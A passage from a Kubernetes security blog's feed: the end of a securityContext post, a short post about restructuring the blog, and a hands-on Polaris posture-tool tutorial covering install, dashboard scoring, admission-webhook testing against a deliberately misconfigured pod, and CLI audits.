<p>At this point, the workload is no longer "a pod with a <code>securityContext</code>." It is a Linux process with a fixed identity, privilege set, and syscall surface.</p>
<p>Kubernetes expressed intent earlier. The kernel is now enforcing the contract.</p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p><code>securityContext</code> does not secure a workload by itself. It defines the contract that the kernel will enforce. When that contract aligns with how an application actually behaves, it removes entire classes of risk.</p>
<p>When it doesn’t, the result is often surprising behavior, failed startups, or outright crashes. Those crashes are not Kubernetes being fragile. They are the kernel enforcing constraints that were previously absent or misaligned. Understanding why that happens is a topic worth its own deep dive.</p>
<p>For now, the key takeaway is simple:</p>
<ul>
<li><p>Kubernetes expresses intent</p>
</li>
<li><p>the runtime translates it</p>
</li>
<li><p>the kernel enforces it</p>
</li>
</ul>
<p>Everything else exists to make sure that contract is intentional, consistent, and observable.</p>
]]></content:encoded></item><item><title><![CDATA[CloudSec Burrito 2.0]]></title><description><![CDATA[Over the last year (actually 8 months), I managed to publish 23 posts on this blog. It meant a lot of long days, numerous lab rebuilds, half-finished markdown litter, and more time than I care to admit staring at Kubernetes YAML wondering why somethi...]]></description><link>https://cloudsecburrito.com/cloudsec-burrito-2-0-better-layers</link><guid isPermaLink="true">https://cloudsecburrito.com/cloudsec-burrito-2-0-better-layers</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[rbac]]></category><category><![CDATA[Linux]]></category><category><![CDATA[MermaidJS]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Fri, 16 Jan 2026 04:33:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1768522701411/50ae1c2d-ca08-4f89-967c-b951b81a2899.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Over the last year (actually 8 months), I managed to publish <strong>23 posts</strong> on this blog. It meant a lot of long days, numerous lab rebuilds, half-finished markdown litter, and more time than I care to admit staring at Kubernetes YAML wondering why something that <em>definitely</em> should have worked… didn’t.</p>
<p>Then things slowed down. December showed up. Life outside of Kubernetes continued to exist. The blog stalled a bit. Ideas did not dry up, but the process didn’t scale. Every post felt like a full production, which made consistency harder than it needed to be.</p>
<p>That’s what <strong>CloudSec Burrito 2.0</strong> is about. Not writing more. Writing <strong>more intentionally</strong>.</p>
<p>Part of that reset is tooling and structure. I’ve moved planning and drafting from .md files scattered everywhere into <strong>Notion</strong>, as a way to enforce consistency:</p>
<ul>
<li><p>Reusable post templates</p>
</li>
<li><p>Clear sections and framing</p>
</li>
<li><p>A bias toward diagrams and concrete artifacts</p>
</li>
<li><p>Less reinvention, more iteration</p>
</li>
</ul>
<p>Same topics. Same hands-on approach. Better assembly.</p>
<hr />
<h2 id="heading-what-changes-in-burrito-20">What Changes in Burrito 2.0</h2>
<p>Burrito 2.0 is about <strong>repeatable structure</strong>, not one-off essays.</p>
<p>Each post aims to ship <strong>at least one concrete artifact</strong>:</p>
<ul>
<li><p>A diagram that anchors the idea</p>
</li>
<li><p>A runnable or inspectable example</p>
</li>
<li><p>A decision or evaluation framework</p>
</li>
<li><p>A mental model you can reuse later</p>
</li>
</ul>
<p>And just as important:</p>
<blockquote>
<p><strong>Not every post needs to be a full sit-down meal.</strong></p>
</blockquote>
<p>You’ll see more <strong>short-form posts</strong> alongside deeper dives:</p>
<ul>
<li><p>One diagram with commentary</p>
</li>
<li><p>One focused lab note or gotcha</p>
</li>
<li><p>One clarification that saves you rereading a 2,000-word post</p>
</li>
</ul>
<p>Think fewer overstuffed burritos, more intentionally built tacos in between.</p>
<hr />
<h2 id="heading-a-concrete-example-how-do-you-actually-access-a-kubernetes-cluster">A Concrete Example: “How Do You Actually Access a Kubernetes Cluster?”</h2>
<p>Let’s pick on <a target="_blank" href="https://cloudsecburrito.com/access-control-actually-kubeadm-and-the-roots-of-kubernetes-access">one post</a> on K8s RBAC that I like, which makes it a good candidate for highlighting improvements.</p>
<p>It opens with a familiar lab reality:</p>
<blockquote>
<p><em>You’ve got a Kubernetes cluster running locally. You SSH to a node, run kubectl, and you’re in.</em></p>
</blockquote>
<p>From there, it walks through:</p>
<ul>
<li><p>SSH access to a node</p>
</li>
<li><p>kubeconfig and client certificates</p>
</li>
<li><p>Kubernetes authentication vs authorization</p>
</li>
<li><p>RBAC, ClusterRoles, and bindings</p>
</li>
<li><p>Service accounts and default tokens</p>
</li>
<li><p>The full auth → RBAC chain</p>
</li>
</ul>
<p>Technically: solid.<br />Educationally: useful.<br />Structurally: this is where Burrito 2.0 shows its value.</p>
<hr />
<h2 id="heading-how-this-post-could-have-been-better-burrito-20-lens">How This Post Could Have Been Better (Burrito 2.0 Lens)</h2>
<h3 id="heading-1-it-needed-an-early-diagram">1. It Needed an Early Diagram</h3>
<p>The post explains the access chain well, but only after a lot of text.</p>
<p>A simple diagram near the top would anchor everything that follows and give readers a mental model before diving into mechanics.</p>
<h3 id="heading-2-the-who-am-i-question-came-too-late">2. The “Who Am I?” Question Came Too Late</h3>
<p>A strong idea in the article is this contrast:</p>
<ul>
<li><p>Linux knows who I am.</p>
</li>
<li><p>Kubernetes often does not know the <em>human</em> behind the request.</p>
</li>
</ul>
<p>That question is the hook. In Burrito 2.0, it belongs up front, not halfway down the page.</p>
<h3 id="heading-3-it-mixed-learning-and-operating-without-calling-it-out">3. It Mixed “Learning” and “Operating” Without Calling It Out</h3>
<p>The post teaches:</p>
<ul>
<li><p>How Kubernetes access works</p>
</li>
<li><p>Why the default approach is risky in practice</p>
</li>
</ul>
<p>Both are valuable, but the transition between them wasn’t explicit.</p>
<hr />
<h2 id="heading-what-burrito-20-optimizes-for">What Burrito 2.0 Optimizes For</h2>
<p>Using that post as a reference point, Burrito 2.0 emphasizes:</p>
<ul>
<li><p>Diagrams early to anchor complex flows</p>
</li>
<li><p>Clear framing questions at the start</p>
</li>
<li><p>Explicit transitions from <em>how it works</em> to <em>why it matters</em></p>
</li>
<li><p>Shorter, focused follow-ups instead of one massive brain dump</p>
</li>
</ul>
<p><strong>Better layering</strong>.</p>
<hr />
<h2 id="heading-embedded-diagram-example-mermaid">Embedded Diagram Example (Mermaid)</h2>
<p>One of the concrete changes in Burrito 2.0 is pushing diagrams <em>earlier</em> in the post to anchor the discussion. Instead of discovering the flow halfway through a wall of text, the idea is to make the access path explicit up front.</p>
<p>This diagram shows the full chain from a human on a laptop to effective permissions inside the cluster. Using my new favorite language, Mermaid!</p>
<pre><code class="lang-mermaid">flowchart TB
    H["Human"] -- ssh --&gt; N["Node shell"]
    N -- kubectl --&gt; K["kubeconfig (current context)"]
    K --&gt; C["Credential (client cert / token)"]
    C --&gt; APIS["API Server"]
    APIS --&gt; ID["User + Groups (derived identity)"]
    ID --&gt; RBAC["RBAC (roles &amp; bindings in etcd)"]
    RBAC --&gt; PERM["Effective permissions"]
    APIS -- audit (if enabled) --&gt; AUD["Audit log entries"]
</code></pre>
<p>And the payoff.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1768537821685/5900bef4-03de-40da-8580-753586020098.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>CloudSec Burrito 2.0 isn’t about a new direction. It’s about a better process.</p>
<p>Same tortilla. Better layers. More Chipotle-level wrapping.</p>
<p>And yes, this might be a cheat post, but it counts in my book.</p>
]]></content:encoded></item><item><title><![CDATA[Kubernetes Posture Made Simple With Polaris]]></title><description><![CDATA[Kubernetes has slim pickings when it comes to open source “posture tools.” We’ve already looked at kube-bench, which is not terrible. So, still wandering the landscape in search of the Holy Grail, we’re now turning to Fairwinds Polaris.
Polaris tries...]]></description><link>https://cloudsecburrito.com/kubernetes-posture-made-simple-with-polaris</link><guid isPermaLink="true">https://cloudsecburrito.com/kubernetes-posture-made-simple-with-polaris</guid><category><![CDATA[fairwinds]]></category><category><![CDATA[kspm]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[polaris]]></category><category><![CDATA[admission controller]]></category><category><![CDATA[Security]]></category><category><![CDATA[Kubernetes Security]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 26 Nov 2025 21:16:27 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1764191712678/0f2f0ff5-f4fe-4fe7-ae41-9219a95af5ee.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Kubernetes has slim pickings when it comes to open source “posture tools.” We’ve already looked at <a target="_blank" href="https://cloudsecburrito.com/kube-bench-the-posture-check-that-time-forgot">kube-bench</a>, which is not terrible. So, still wandering the landscape in search of the Holy Grail, we’re now turning to <a target="_blank" href="https://polaris.docs.fairwinds.com/">Fairwinds Polaris</a>.</p>
<p>Polaris tries to cover three angles:</p>
<ul>
<li><p><strong>A dashboard</strong> that shows you workload posture issues (nothing groundbreaking, but workable)</p>
</li>
<li><p><strong>An admission controller</strong> that can… well, do admission controller things</p>
</li>
<li><p><strong>A CLI/CI scanner</strong> that flags obvious problems before you unleash them on a cluster</p>
</li>
</ul>
<p>The dashboard is… fine. Polished enough, just not particularly inspired. The checks behind it are solid, and the fact that you get dashboard + AC + pipeline scanning in one lightweight package is, objectively, something. It’s worth noting that Polaris mixes in a fair number of non-security checks as well, which we’ll take a look at.</p>
<p>But here’s the honest tl;dr: <strong>Polaris is useful, but it’s not exactly the kind of tool you rearrange your security stack for</strong>. The juice isn't quite worth the squeeze. Still, it's worth a look, if only to confirm that feeling.</p>
<hr />
<h2 id="heading-installing-polaris">Installing Polaris</h2>
<p>Polaris ships as a Helm chart, and the install process is easy. If all you care about is seeing the dashboard and getting a quick read on your workload posture, this is the simplest path.</p>
<h3 id="heading-1-add-the-fairwinds-repo">1. Add the Fairwinds repo</h3>
<pre><code class="lang-bash">helm repo add fairwinds-stable https://charts.fairwinds.com/stable
helm repo update
</code></pre>
<h3 id="heading-2-construct-a-values-file">2. Construct a values file</h3>
<p>This is one of the nicer parts of Polaris: with just a few settings you can get a clean <code>NodePort</code> service for the dashboard and a safely scoped admission controller. The webhook runs in <code>Fail</code> mode and only for namespaces labeled with <code>ac-land</code>, which we’ll set up later for testing.</p>
<p>Save the following as <code>values.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">dashboard:</span>
  <span class="hljs-attr">service:</span>
    <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>

<span class="hljs-attr">webhook:</span>
  <span class="hljs-attr">enable:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">validate:</span> <span class="hljs-literal">true</span>
  <span class="hljs-attr">mutate:</span> <span class="hljs-literal">false</span>
  <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Fail</span>
  <span class="hljs-attr">namespaceSelector:</span>
    <span class="hljs-attr">matchExpressions:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span> <span class="hljs-string">ac-land</span>
      <span class="hljs-attr">operator:</span> <span class="hljs-string">Exists</span>
</code></pre>
<h3 id="heading-3-install-polaris-dashboard-and-admission-control-enabled">3. Install Polaris (dashboard and admission control enabled)</h3>
<pre><code class="lang-bash">helm upgrade --install polaris fairwinds-stable/polaris --namespace polaris --create-namespace -f values.yaml
</code></pre>
<p>This gives you the Deployment, Service, RBAC, and all the usual Helm chart trimmings. </p>
<h3 id="heading-4-accessing-the-dashboard">4. Accessing the Dashboard</h3>
<p>Grab the node port from the <code>NodePort</code> service we now have.</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl get svc -n polaris
NAME                TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)        AGE
polaris-dashboard   NodePort    10.97.42.83     &lt;none&gt;        80:32423/TCP   5m46s
polaris-webhook     ClusterIP   10.104.102.78   &lt;none&gt;        443/TCP        41m
</code></pre>
<p>Now you can hit:</p>
<pre><code class="lang-bash">http://&lt;node-ip&gt;:32423 <span class="hljs-comment">#or whatever your NodePort is</span>
</code></pre>
<p>Success, your dashboard is now running.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1764108762740/47d5b885-4701-445f-a2a3-4682ddcbd2f4.png" alt class="image--center mx-auto" /></p>
<hr />
<h2 id="heading-dashboard-walkthrough">Dashboard Walkthrough</h2>
<p>Let’s start with the annoying part: when you open the Polaris dashboard, the very first thing you see is a giant header linking out to all things Fairwinds/Polaris. And yes — there’s what looks like an embedded ad. Which, for extra spice, leads to a 404. Not a great first impression, but I digress.</p>
<p>Here’s what the dashboard actually gives you:</p>
<h3 id="heading-overview">Overview</h3>
<p>This section shows:</p>
<ul>
<li>IP address  </li>
<li>Overall grade  </li>
<li>A donut chart breaking down Passing, Warning, and Dangerous checks  </li>
</ul>
<p>None of this is clickable.<br />The grade is the most interesting (and the most confusing) part — but we’ll get into that later.</p>
<h3 id="heading-insights">Insights</h3>
<p>This appears to be the same information as the Overview, just in a slightly different layout.<br />There’s no new detail, no navigation, no drill-down.<br />Not sure what purpose this panel serves beyond filling space.</p>
<h3 id="heading-categories">Categories</h3>
<p>This breaks down your results into Polaris’s three buckets:</p>
<ul>
<li><strong>Efficiency</strong>  </li>
<li><strong>Reliability</strong>  </li>
<li><strong>Security</strong></li>
</ul>
<p>It’s a nice view, but still not interactive.<br />The only clickable element is a link that takes you to the generic findings definitions in the Polaris docs — not to the specific finding, not to your workload, just the docs homepage for categories.</p>
<h3 id="heading-namespaces-cluster-resources">Namespaces / Cluster Resources</h3>
<p>This is the part that actually works:</p>
<ul>
<li>You get a list of cluster-wide resources  </li>
<li>Below that, a list of resources grouped by namespace  </li>
<li>Clicking either lets you expand and see which checks passed or failed  </li>
</ul>
<p>You can also filter by namespace, which updates the Overview to show posture for only that slice of the cluster — probably the most genuinely useful interaction in the entire dashboard.</p>
<p>For each individual check, you’ll find a tiny “info” icon, but it just links you back to the generic Polaris docs again. No contextual explanation, no specific guidance.</p>
<h3 id="heading-tldr">TL;DR</h3>
<p><strong>The dashboard is functional, but limited. It's useful in small doses, but not something you’ll rely on day‑to‑day.</strong></p>
<hr />
<h2 id="heading-understanding-the-grade">Understanding the Grade</h2>
<p>The grade is the most interesting and confusing part of the Polaris dashboard. This is all about <a target="_blank" href="https://polaris.docs.fairwinds.com/customization/checks/">checks</a>.</p>
<blockquote>
<p>This is where I'll pretend I'm a data scientist. But hey, I did take statistics once upon a time.</p>
</blockquote>
<p>You get three numbers:</p>
<ul>
<li><strong>Passing</strong> — checks you passed  </li>
<li><strong>Warning</strong> — checks that aren’t ideal, but not catastrophic (I am guessing)  </li>
<li><strong>Dangerous</strong> — checks that are actually bad  </li>
</ul>
<p>You’ll also see a little note under the score explaining that <strong>Warnings get half the weight of dangerous checks</strong>. Sounds simple enough:</p>
<pre><code class="lang-bash">score = Passing / (Passing + Dangerous + 0.5 * Warning)
</code></pre>
<h3 id="heading-why-this-is-confusing">Why this is confusing</h3>
<p>Warnings are being <strong>scaled down</strong> (only counting as half a “bad” check), but <strong>Passing</strong> is <em>not</em> being scaled in any way to match that weighting.</p>
<p>In other words:</p>
<ul>
<li>Dangerous checks hurt you at full weight  </li>
<li>Warnings hurt you at half weight  </li>
<li>Passing checks always count as full credit, even though warnings are being down-weighted in the denominator.</li>
</ul>
<p>So you’re no longer looking at “percentage of checks passed,” or anything intuitive like that. Instead, you’re looking at a <strong>weighted penalty score</strong>, where warnings only count as half a failure, but never count as half a success.</p>
<h3 id="heading-why-i-dont-get-it">Why I don’t get it…</h3>
<p>If warnings are meant to be “half bad,” logically they should also be “half good.”  Not doing this creates a mismatch:</p>
<ul>
<li>The total checks you see (e.g., 826)<br /><strong>≠</strong>  </li>
<li>The denominator used for grading (which shrinks warnings to 0.5)  </li>
</ul>
<p>The end result is a grade that sort of looks like a percentage…</p>
<h3 id="heading-a-quick-example">A Quick Example</h3>
<p>Let’s use simple round numbers so we can see the problem clearly.</p>
<p>Imagine Polaris reports:</p>
<ul>
<li><strong>Passing:</strong> 700  </li>
<li><strong>Warning:</strong> 76  </li>
<li><strong>Dangerous:</strong> 50  </li>
<li><strong>Total checks:</strong> 826  </li>
</ul>
<p>At first glance, you might think the grade is something like:<br />“700 out of 826 checks passed.”</p>
<p>But that’s <em>not</em> what Polaris calculates.</p>
<h4 id="heading-what-polaris-actually-calculates">What Polaris Actually Calculates</h4>
<p>Using their formula:</p>
<pre><code class="lang-bash">score = 700 / (700 + 50 + 0.5 * 76)
</code></pre>
<p>Compute the denominator:</p>
<ul>
<li>Passing = 700  </li>
<li>Dangerous = 50  </li>
<li>Half the Warnings = 38  </li>
</ul>
<pre><code class="lang-bash">denominator = 700 + 50 + 38 = 788
</code></pre>
<p>So the Polaris score becomes:</p>
<pre><code class="lang-bash">score = 700 / 788 ≈ 0.89
</code></pre>
<p>This isn’t “89% of checks passed.”  It’s “passing divided by a weighted count of badness.” That’s why, in my opinion, the number feels disconnected from what you see on the dashboard.</p>
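<p>You can sanity-check the arithmetic from the example above in a couple of lines of shell (awk handles the floating point):</p>
<pre><code class="lang-bash">passing=700 warning=76 dangerous=50
awk -v p="$passing" -v w="$warning" -v d="$dangerous" \
  'BEGIN { printf "%.2f\n", p / (p + d + 0.5 * w) }'
# prints: 0.89
</code></pre>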
<p>Ok enough of the data science.</p>
<hr />
<h2 id="heading-testing-the-admission-controller">Testing the Admission Controller</h2>
<p>Seriously, another admission controller? </p>
<p>With Polaris using our safe values file, it’s time to actually test the admission controller and see what it catches. The webhook is running in <code>Fail</code> mode and scoped to namespaces carrying the <code>ac-land</code> label, which gives us a safe sandbox to experiment in without risking the rest of the cluster.</p>
<h3 id="heading-create-the-test-namespace">Create the test namespace</h3>
<pre><code class="lang-bash">kubectl create namespace ac-land
kubectl label namespace ac-land ac-land=<span class="hljs-literal">true</span>
</code></pre>
<p>Everything we apply here should be intercepted by the Polaris webhook.</p>
<h3 id="heading-deploy-a-known-bad-workload">Deploy a “known bad” workload</h3>
<p>Let’s start with something obviously wrong. This one runs as root, has no resource limits, and is missing probes, the usual Kubernetes crimes:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Pod</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">bad-pod</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">ac-land</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">containers:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">app</span>
    <span class="hljs-attr">image:</span> <span class="hljs-string">nginx:latest</span>
    <span class="hljs-attr">securityContext:</span>
      <span class="hljs-attr">runAsUser:</span> <span class="hljs-number">0</span>
    <span class="hljs-attr">resources:</span>
      <span class="hljs-attr">requests:</span> {}
      <span class="hljs-attr">limits:</span> {}
</code></pre>
<p>Because we’re running with:</p>
<pre><code>failurePolicy: Fail
</code></pre><p>and validation enabled, the pod will not be created: it fails several "Dangerous" checks, such as "Image tag should be specified." In action we see the following:</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl apply -f bad-pod.yaml
Error from server (Forbidden): error when creating <span class="hljs-string">"bad-pod.yaml"</span>: admission webhook <span class="hljs-string">"polaris.fairwinds.com"</span> denied the request:
Polaris prevented this deployment due to configuration problems:
- Container app: Image tag should be specified
- Container app: Should not be allowed to run as root
- Container app: Privilege escalation should not be allowed
</code></pre>
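<p>For contrast, here’s a variant that should clear those three findings. This is a sketch, not something lifted from the Polaris docs: the <code>good-pod</code> name, the <code>nginxinc/nginx-unprivileged:1.27</code> tag, and UID <code>101</code> are illustrative assumptions.</p>
<pre><code class="lang-yaml">apiVersion: v1
kind: Pod
metadata:
  name: good-pod
  namespace: ac-land
spec:
  containers:
  - name: app
    image: nginxinc/nginx-unprivileged:1.27   # pinned tag clears the image tag check
    securityContext:
      runAsNonRoot: true
      runAsUser: 101                   # non-root UID
      allowPrivilegeEscalation: false  # clears the escalation check
</code></pre>
<p>Warnings like the missing probes may still show up in audits, but by default they shouldn’t block admission.</p>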
<h3 id="heading-check-what-polaris-actually-saw">Check what Polaris actually saw</h3>
<p>Look at the webhook logs:</p>
<pre><code class="lang-bash">matt@cp:~/fairwinds/polaris$ kubectl logs -n polaris -l component=webhook
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/certwatcher/certwatcher.go:139 +0x2e8
    &gt;  sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start.func1()
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:214 +0x28
    &gt;  created by sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start <span class="hljs-keyword">in</span> goroutine 66
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:213 +0x28c
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=info msg=<span class="hljs-string">"Starting admission request"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=info msg=<span class="hljs-string">"Object bad-pod has no owner - running checks"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check automountServiceAccountToken will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check missingNetworkPolicy will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:47:32Z"</span> level=info msg=<span class="hljs-string">"3 validation errors found when validating bad-pod"</span>
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/certwatcher/certwatcher.go:139 +0x2e8
    &gt;  sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start.func1()
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:214 +0x28
    &gt;  created by sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start <span class="hljs-keyword">in</span> goroutine 43
    &gt;      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:213 +0x28c
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=info msg=<span class="hljs-string">"Starting admission request"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=info msg=<span class="hljs-string">"Object bad-pod has no owner - running checks"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check automountServiceAccountToken will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=warning msg=<span class="hljs-string">"no ResourceProvider available, check missingNetworkPolicy will not work in this context (e.g. admission control)"</span>
time=<span class="hljs-string">"2025-11-26T19:15:16Z"</span> level=info msg=<span class="hljs-string">"3 validation errors found when validating bad-pod"</span>
</code></pre>
<p>Polaris gives you some useful information, but it’s presented in a pretty strange way. You’ll see a mix of errors, partial details about which validations failed, and a few items that look like failures but are really just warnings. The webhook logs themselves aren’t exactly pleasant. They’re noisy, inconsistent, and don’t meaningfully explain what Polaris actually decided.</p>
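<p>If you just want the decision lines out of that noise, a tiny filter helps. The structured entries all start with <code>time=</code>, so (a sketch; <code>polaris_log_filter</code> is a hypothetical helper):</p>
<pre><code class="lang-bash"># Keep only the structured log lines; drop goroutine/stack traces.
polaris_log_filter() { grep '^time='; }

# Usage:
#   kubectl logs -n polaris -l component=webhook | polaris_log_filter
</code></pre>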
<p>And the dashboard? As far as I can tell, none of this admission activity shows up there at all. </p>
<hr />
<h2 id="heading-non-security-checks-efficiency-amp-reliability">Non-Security Checks: Efficiency &amp; Reliability</h2>
<p>Polaris isn’t just about security; it also ships with a wide set of <strong>efficiency</strong> and <strong>reliability</strong> checks. These aren’t going to stop an attacker, but they do help catch the everyday “why is this Deployment so fragile?” issues.</p>
<p>These include things like:</p>
<ul>
<li>Missing CPU or memory <em>requests</em></li>
<li>Missing CPU or memory <em>limits</em></li>
<li>Liveness/readiness probes not defined</li>
<li>Using the <code>latest</code> tag</li>
<li>Pods without disruption budgets</li>
</ul>
<p>These show up in the dashboard under the <strong>Efficiency</strong> and <strong>Reliability</strong> categories. The grouping is a bit high-level, but clicking into a Deployment or Pod gives you the full list of checks, their severity, and Polaris' recommendation.</p>
<p>While these aren’t “security” checks per se, they’re useful guardrails for teams that want basic hygiene without pulling in a more complex policy engine. Just don’t expect deep insight. </p>
<hr />
<h2 id="heading-customizing-polaris-checks">Customizing Polaris Checks</h2>
<p>Polaris ships with a <a target="_blank" href="https://github.com/FairwindsOps/polaris/blob/master/pkg/config/default.yaml">large default ruleset</a>, but not all of it will make sense for you! Fortunately, you can tune or disable checks using a <a target="_blank" href="https://polaris.docs.fairwinds.com/customization/configuration/">simple configuration file</a>.</p>
<h3 id="heading-example-configyaml">Example <code>config.yaml</code></h3>
<pre><code class="lang-yaml"><span class="hljs-attr">checks:</span>
  <span class="hljs-attr">cpuRequestsMissing:</span> <span class="hljs-string">warning</span>
  <span class="hljs-attr">cpuLimitsMissing:</span> <span class="hljs-string">ignore</span>
  <span class="hljs-attr">readinessProbeMissing:</span> <span class="hljs-string">danger</span>
  <span class="hljs-attr">livenessProbeMissing:</span> <span class="hljs-string">warning</span>
  <span class="hljs-attr">tagNotSpecified:</span> <span class="hljs-string">ignore</span>
</code></pre>
<h3 id="heading-applying-it">Applying It</h3>
<pre><code class="lang-bash">helm upgrade --install polaris fairwinds-stable/polaris   -n polaris   -f values.yaml   --set-file config=config.yaml
</code></pre>
<p>Customizing checks helps reduce noise and lets Polaris fit your environment instead of the other way around. Not such a bad thing, I guess.</p>
<hr />
<h2 id="heading-polaris-in-cli-amp-ci">Polaris in CLI &amp; CI</h2>
<p>Polaris can be used as a CLI or CI scanner. This is the mode where its checks are surfaced cleanly and without the noise of dashboards or webhooks.</p>
<h3 id="heading-cli-scan-example">CLI Scan Example</h3>
<p>First install via brew locally.</p>
<pre><code class="lang-bash">brew tap FairwindsOps/tap
brew install FairwindsOps/tap/polaris
</code></pre>
<p>Then run against the <code>bad-pod.yaml</code> file from earlier.</p>
<pre><code class="lang-bash">matt.brown@matt Polaris % polaris audit --audit-path . --format=pretty
Polaris audited Path . at 2025-11-26T12:15:52-08:00
    Nodes: 0 | Namespaces: 0 | Controllers: 1
    Final score: 48

Pod bad-pod <span class="hljs-keyword">in</span> namespace ac-land
    metadataAndInstanceMismatched        😬 Warning
        Reliability - Label app.kubernetes.io/instance must match metadata.name
    hostNetworkSet                       🎉 Success
        Security - Host network is not configured
    hostPIDSet                           🎉 Success
        Security - Host PID is not configured
    hostPathSet                          🎉 Success
        Security - HostPath volumes are not configured
    hostProcess                          🎉 Success
        Security - Privileged access to the host check is valid
    missingNetworkPolicy                 😬 Warning
        Security - A NetworkPolicy should match pod labels and contain applied egress and ingress rules
    priorityClassNotSet                  😬 Warning
        Reliability - Priority class should be <span class="hljs-built_in">set</span>
    procMount                            🎉 Success
        Security - The default /proc masks are <span class="hljs-built_in">set</span> up to reduce attack surface, and should be required
    topologySpreadConstraint             😬 Warning
        Reliability - Pod should be configured with a valid topology spread constraint
    automountServiceAccountToken         😬 Warning
        Security - The ServiceAccount will be automounted
    hostIPCSet                           🎉 Success
        Security - Host IPC is not configured
  Container app
    sensitiveContainerEnvVar             🎉 Success
        Security - The container does not <span class="hljs-built_in">set</span> potentially sensitive environment variables
    tagNotSpecified                      ❌ Danger
        Reliability - Image tag should be specified
    hostPortSet                          🎉 Success
        Security - Host port is not configured
    linuxHardening                       😬 Warning
        Security - Use one of AppArmor, Seccomp, SELinux, or dropping Linux Capabilities to restrict containers using unwanted privileges
    pullPolicyNotAlways                  😬 Warning
        Reliability - Image pull policy should be <span class="hljs-string">"Always"</span>
    insecureCapabilities                 😬 Warning
        Security - Container should not have insecure capabilities
    memoryRequestsMissing                😬 Warning
        Efficiency - Memory requests should be <span class="hljs-built_in">set</span>
    privilegeEscalationAllowed           ❌ Danger
        Security - Privilege escalation should not be allowed
    cpuLimitsMissing                     😬 Warning
        Efficiency - CPU limits should be <span class="hljs-built_in">set</span>
    dangerousCapabilities                🎉 Success
        Security - Container does not have any dangerous capabilities
    livenessProbeMissing                 😬 Warning
        Reliability - Liveness probe should be configured
    memoryLimitsMissing                  😬 Warning
        Efficiency - Memory limits should be <span class="hljs-built_in">set</span>
    notReadOnlyRootFilesystem            😬 Warning
        Security - Filesystem should be <span class="hljs-built_in">read</span> only
    readinessProbeMissing                😬 Warning
        Reliability - Readiness probe should be configured
    runAsPrivileged                      🎉 Success
        Security - Not running as privileged
    runAsRootAllowed                     ❌ Danger
        Security - Should not be allowed to run as root
    cpuRequestsMissing                   😬 Warning
        Efficiency - CPU requests should be <span class="hljs-built_in">set</span>
</code></pre>
<p>Polaris acts like a lightweight linter for Kubernetes YAML. It's fast, easy to plug in, and gives clear feedback on both security and reliability issues before anything ever hits version control or your cluster. Nice touch with the emojis, at least. </p>
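<p>To make that linting enforceable in CI, Polaris's audit command can fail the pipeline outright. A hedged sketch (the exit-code flags below are from the Polaris docs at the time of writing — verify against your installed version):</p>

```bash
# Fail the build if any "danger" check fires,
# or if the overall score drops below 80.
polaris audit --audit-path ./manifests \
  --set-exit-code-on-danger \
  --set-exit-code-below-score 80
```

A non-zero exit code is all most CI systems need to block the merge.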
<hr />
<h2 id="heading-bonus-a-quick-look-at-pluto-outdated-api-checker">Bonus: A Quick Look at Pluto (Outdated API Checker)</h2>
<p>Pluto is a companion Fairwinds tool that identifies deprecated or soon‑to‑be‑removed Kubernetes API versions. It’s perfect for catching upcoming breakage before your next cluster upgrade.</p>
